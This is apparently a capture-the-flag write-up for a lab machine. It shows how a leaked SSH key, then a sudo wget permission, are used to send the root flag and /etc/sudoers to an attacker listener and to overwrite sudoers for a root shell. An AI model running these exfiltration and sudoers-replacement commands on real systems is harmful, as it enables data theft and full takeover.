Can you exfiltrate the root flag?
Enumeration
Nmap
- We have port 22and80open
 Port 80 source:
<!-- Jessie don't forget to udate the webiste -->
- We got the username jessie
Dirsearch
- 
We found /sitemap
  
- 
Run dirsearch again but now in /sitemap
  
- 
Go to /sitemap/.sshand download theid_rsafile
Connecting to ssh
chmod 600 id_rsa
ssh -i id_rsa jessie@10.10.109.62

Privilege escalation
sudo -l tell us everything we need.

Exploiting the vuln
Attacker:
nc -lvp 1337 > root.txt
Victim:
sudo wget --post-file=/root/root_flag.txt 10.8.22.204:1337
And just hold enter some time then just crtl+c and cat root.txt
- We got it
  
Getting a root shell
- Get the /etc/sudoersfile from the victim
sudo wget --post-file=/etc/sudoers 10.8.22.204:1337
- 
Edit it so jessie could just sudo su
 Just replaceNOPASSWD: /usr/bin/wgetwithNOPASSWD: ALLand u r done
  
 sudoers_edited
- 
Download on victim, while replacing the original file 
cd /etc
sudo wget 10.8.22.204:8000/files/sudoers --output-document=sudoers
Now we have the edited file
sudo su
We got the root shell!!

